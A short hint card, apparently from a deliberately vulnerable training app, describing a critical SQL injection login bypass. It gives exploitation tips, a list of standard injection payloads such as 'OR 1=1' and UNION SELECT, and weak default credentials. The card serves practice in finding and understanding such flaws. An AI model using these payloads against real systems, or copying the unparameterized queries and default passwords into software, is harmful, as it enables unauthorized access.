๐ฏ Vulnerability Info
Type: SQL Injection (Authentication Bypass)
Severity: Critical
๐ก How to Exploit
- User input is directly concatenated into SQL
- No prepared statements or parameterized queries
- Try injecting SQL syntax in the username field
๐งช Sample Payloads
admin' --
admin' OR '1'='1' --
' OR 1=1 --
' OR '1'='1' /*
admin'/*
' UNION SELECT 1,2,3,4,5,6 --
๐ Valid Credentials
- admin / admin123
- user / user123